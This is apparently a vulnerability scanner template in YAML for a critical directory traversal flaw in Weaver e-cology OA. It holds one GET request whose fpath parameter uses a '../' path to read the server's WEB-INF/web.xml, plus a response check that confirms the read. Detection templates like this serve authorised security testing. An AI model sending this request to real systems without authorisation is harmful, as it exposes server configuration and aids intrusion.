id: e-cology-filedownload-directory-traversal

info:
  name: 泛微OA e-cology 文件下载目录遍历
  author: l1nk3r
  severity: critical
  description: 泛微OA e-cology 文件下载目录遍历 app="Weaver-OA"
  reference:
    - https://www.weaver.com.cn/cs/securityDownload.asp

rules:
    r0:
        request:
            method: GET
            path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
        expression: response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
expression: r0()